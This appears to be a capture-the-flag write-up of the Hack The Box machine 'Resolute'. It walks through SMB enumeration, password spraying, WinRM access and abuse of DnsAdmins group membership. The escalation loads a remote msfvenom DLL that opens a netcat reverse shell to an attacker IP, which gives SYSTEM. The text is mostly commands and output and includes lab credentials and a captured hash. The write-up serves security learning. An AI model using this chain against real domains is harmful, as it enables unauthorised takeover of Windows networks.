Resolute was a fun 30 point box created by egre55. It starts out by finding a set of credentials via SMB enumeration which allows you to password spray and find that the password has been reused, allowing you to login via WinRM and get the user flag. You then find a set of credentials in a PowerShell Transcript file, log in again via WinRM with those credentials, and then finally abuse the user’s group privileges to get root.
User.txt
Nmap
A quick nmap scan reveals the following ports:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# nmap -sT -p- --min-rate 5000 10.10.10.169
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-11 15:20 EST
Nmap scan report for 10.10.10.169
Host is up (0.017s latency).
Not shown: 65511 closed ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
Focusing on the more important ports we get the following information:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# nmap -sV -sC -T4 -p 53,88,135,139,389,445 10.10.10.169
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-11 20:33:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
Host script results:
|_clock-skew: mean: 2h46m57s, deviation: 4h37m09s, median: 6m56s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2020-01-11T12:34:03-08:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-01-11T20:34:05
|_ start_date: 2020-01-11T11:05:42
SMB
Running nullinux with the -users flag presents you with a list of users and their associated group memberships:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
# nullinux -users 10.10.10.169
[*] Enumerating Domain Information for: 10.10.10.169
[+] Domain Name: MEGABANK
[+] Domain SID: S-1-5-21-1392959593-3013219662-3596683436
[*] Enumerating querydispinfo for: 10.10.10.169
abigail
Administrator
angela
annette
annika
claire
claude
DefaultAccount
felicia
fred
Guest
gustavo
krbtgt
marcus
marko
melanie
naoki
paulo
per
ryan
sally
simon
steve
stevie
sunita
ulf
zach
[*] Enumerating enumdomusers for: 10.10.10.169
Administrator
Guest
krbtgt
DefaultAccount
ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
gustavo
ulf
stevie
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki
[*] Enumerating LSA for: 10.10.10.169
[*] Performing RID Cycling for: 10.10.10.169
[*] Testing 10.10.10.169 for Known Users
[*] Enumerating Group Memberships for: 10.10.10.169
[+] Group: Enterprise Read-only Domain Controllers
[+] Group: Domain Admins
Administrator
[+] Group: Domain Users
Administrator
DefaultAccount
krbtgt
ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
gustavo
ulf
stevie
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki
[+] Group: Domain Guests
Guest
[+] Group: Domain Computers
MS02$
[+] Group: Domain Controllers
RESOLUTE$
[+] Group: Schema Admins
Administrator
[+] Group: Enterprise Admins
Administrator
[+] Group: Group Policy Creator Owners
Administrator
[+] Group: Read-only Domain Controllers
[+] Group: Cloneable Domain Controllers
[+] Group: Protected Users
[+] Group: Key Admins
[+] Group: Enterprise Key Admins
[+] Group: DnsUpdateProxy
[+] Group: Contractors
ryan
Make note of the user ryan in the Contractors group.
Further enumerating SMB I decided to run enum4linux, it provided some interesting information in the account description field of one of the users:
1
2
3
4
5
6
7
8
9
10
11
# enum4linux -a 10.10.10.169
=============================
| Users on 10.10.10.169 |
=============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
<REDACTED>
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (null) Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
<REDACTED>
You can see the marko account Desc contains Account created. Password set to Welcome123!.
Password Spraying
Obviously the credentials marko / Welcome123! didn’t work for any of the services (Kerberos, SMB, and WinRM), maybe we can password spray with crackmapexec and see if there is any password reuse in place.
I added all the users from the nullinux output into a file and parsed it to the -u flag with crackmapexec:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
# crackmapexec smb 10.10.10.169 -u users.txt -p 'Welcome123!'
CME 10.10.10.169:445 RESOLUTE [*] Windows 10.0 Build 14393 (name:RESOLUTE) (domain:MEGABANK)
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\Administrator:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\krbtgt:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\ryan:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\marko:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\sunita:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\abigail:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\marcus:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\sally:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\fred:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\angela:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\felicia:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\gustavo:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\ulf:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\stevie:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\claire:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\paulo:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\steve:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\annette:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\annika:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\per:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\claude:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [+] MEGABANK\melanie:Welcome123!
[*] KTHXBYE!
You can see the credentials melanie / Welcome123! succeeded.
Flag
You can simply WinRM into resolute and type the user flag:
1
2
3
4
5
6
7
8
9
10
# evil-winrm -i 10.10.10.169 -u melanie -p Welcome123!
Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\melanie\Documents> whoami
megabank\melanie
*Evil-WinRM* PS C:\Users\melanie\desktop> type user.txt
0c3be4...
Root.txt
PowerShell Transcripts
Running dir -Force allows you to list hidden files and directories:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
*Evil-WinRM* PS C:\> dir -force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 5/29/2020 3:47 AM 402653184 pagefile.sys
You’ll notice a PSTranscripts directory in C:\. PowerShell Transcripts allow you to record all/part of a PowerShell session to a text file, including all the commands the user typed as well as any output that appeared on the console.
The PSTranscripts directory contains another hidden directory:
1
2
3
4
5
6
7
*Evil-WinRM* PS C:\PSTranscripts> dir -force
Directory: C:\PSTranscripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--h-- 12/3/2019 6:45 AM 20191203
Changing directory and checking for more hidden files, we can see the following transcript is present:
1
2
3
4
5
6
7
*Evil-WinRM* PS C:\PSTranscripts\20191203> dir -force
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
The file contains some interesting information but the main line that stands out is shown below:
1
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
Shell as Ryan
With Ryan’s credentials we can simply login again via WinRM:
1
2
3
4
5
6
7
8
# evil-winrm -i 10.10.10.169 -u ryan -p Serv3r4Admin4cc123!
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami
megabank\ryan
Groups
Running whoami /all as ryan presents some interesting output, particularly in the GROUP INFORMATION section:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all
<REDACTED>
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
<REDACTED>
You can see that ryan is a member of Contractors and DnsAdmins.
The DnsAdmins group has a well known vulnerability that allows a user to load a remote DLL to the dns service binary and achieve code execution. A great article from ired.team can be found here, it describes the exploitation process in a simple and concise manner.
Nested Groups
It appears Contractors is a nested group, this can be confirmed with the following command:
1
2
3
4
5
6
7
8
*Evil-WinRM* PS C:\Users\ryan\Documents> Get-ADGroupMember -Identity 'DnsAdmins'
distinguishedName : CN=Contractors,OU=Groups,DC=megabank,DC=local
name : Contractors
objectClass : group
objectGUID : 9f2ff7be-f805-491f-aff1-3653653874d7
SamAccountName : Contractors
SID : S-1-5-21-1392959593-3013219662-3596683436-1103
Contractors is nested with the DnsAdmins group, and ryan is a member of Contractors, so he essentially has DnsAdmins group privileges. The easy way to show nested group members is by using the -Recursive flag:
1
2
3
4
5
6
7
8
*Evil-WinRM* PS C:\Users\ryan\Documents> Get-ADGroupMember -Identity 'DnsAdmins' -Recursive
distinguishedName : CN=Ryan Bertrand,OU=Contractors,OU=MegaBank Users,DC=megabank,DC=local
name : Ryan Bertrand
objectClass : user
objectGUID : 848c83e3-6cbe-4d3e-bacf-aa7bd37da691
SamAccountName : ryan
SID : S-1-5-21-1392959593-3013219662-3596683436-1105
With that confirmed let’s move on to the dns service itself.
dns service
Before attempting the exploit I wanted to check the permissions our user has over the dns service by gettting the SDDL security descriptor:
1
2
3
C:\>sc sdShow dns
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)(A;;LCRPWPDTLORC;;;S-1-5-21-1392959593-3013219662-3596683436-1105)
I created a short post recently covering SDDL security descriptors, in particular for service permissions. The ACE structure is as follows:
1
(ace_type; ace_flags; rights; object_guid; inherit_object_guid; account_sid)
You’ll notice the SID in the last ACE matches Ryan Bertrand’s SID:
1
(A;;LCRPWPDTLORC;;;S-1-5-21-1392959593-3013219662-3596683436-1105)
The following table contains the rights for the service:
| Symbol | Right |
|---|---|
| CC | SERVICE_QUERY_CONFIG |
| LC | SERVICE_QUERY_STATUS |
| SW | SERVICE_ENUMERATE_DEPENDENTS |
| RP | SERVICE_START |
| WP | SERVICE_STOP |
| DT | SERVICE_PAUSE_CONTINUE |
| LO | SERVICE_INTERROGATE |
| RC | READ_CONTROL |
Comparing the rights from the ACE to the table values we can understand the privileges a user has over a service, the most important rights in this instance are the ability to stop and start the dns service.
DnsAdmins
As described by Microsoft:
Members of DNSAdmins group have access to network DNS information. The default permissions are as follows: Allow: Read, Write, Create All Child objects, Delete Child objects, Special Permissions. This group exists only if the DNS server role is or was once installed on a domain controller in the domain.
The management of the DNS service is done using the DNS Server Management Protocol:
The Domain Name Service (DNS) Server Management Protocol defines RPC interfaces that provide methods for remotely accessing and administering a DNS server. It is a client/server protocol based on RPC that is used in the configuration, management, and monitoring of a DNS server.
The Microsoft tool dnscmd is a command-line interface for managing DNS servers. This tool will allow us to make a specific change to the DNS server’s /serverlevelplugindll parameter, which specifies the path of a custom plug-in.
The syntax is /serverlevelpluginddl <dllpath>, with the dllpath specifiying the fully qualified path name of a valid DNS server plug-in. We can parse a UNC path to this parameter, allowing us to load a custom DLL from our remote host.
The following article was written by Shay Ber and describes the attack in great detail, it can be found here.
Exploiting DnsAdmins
Refering to the ired.team article, the exploit process I used is shown below.
First, I uploaded nc64.exe to a world writable directory - C:\programdata. I then created a simple DLL with msfvenom that runs a nc reverse shell:
1
# msfvenom -p windows/x64/exec cmd='C:\programdata\nc64.exe 10.10.14.45 443 -e cmd.exe' -f dll > nc.dll
Next, I configured the dns service to use this new remote DLL located on my attacking host (using the FQDN from running Get-ADComputer -Filter *):
1
dnscmd Resolute.megabank.local /config /serverlevelplugindll \\10.10.14.45\reso\nc.dll
After that you can double check it configured successfully:
1
2
3
4
5
6
7
8
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
ServerLevelPluginDll : \\10.10.14.45\reso\nc.dll
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters\
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS
PSChildName : Parameters
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
I then started a local SMB server using the smbserver.py script from Impacket (making sure the nc.dll is in the correct share):
1
# python smbserver.py reso /root/reso
Then you simply need to stop and start the dns service:
1
2
3
sc.exe \\Resolute.megabank.local stop dns
sc.exe query dns
sc.exe \\Resolute.megabank.local start dns
You should receive output like the following in the smbserver.py terminal:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,53729)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:4141414141414141:7e044e15e6bafcdee2496aec467f2908:0101000000000000808bb4567fc9d501f473f5841e6b768a00000000010010006a0079004500510043006a0064006b000200
100079006c0073004c00610049004c006d00030010006a0079004500510043006a0064006b000400100079006c0073004c00610049004c006d0007000800808bb4567fc9d5010600040002000000080030003000000000
000000000000000040000014da554f47382d1774e0f1ec3fb500b69d0e2a875f126a359ad6d37aef84b82b0a001000000000000000000000000000000000000900200063006900660073002f00310030002e0031003000
2e00310034002e00340035000000000000000000
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:RESO)
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.10.10.169,53729)
[*] Remaining connections []
This confirms that the dns service has hit our smbserver and grabbed the DLL. You should then receive a netcat reverse shell fairly quickly:
1
2
3
4
5
6
7
8
9
# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.169] 56589
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
Flag
With a shell as SYSTEM you can simply type the root flag:
1
2
3
C:\Users\Administrator\Desktop>type root.txt
type root.txt
e1d948...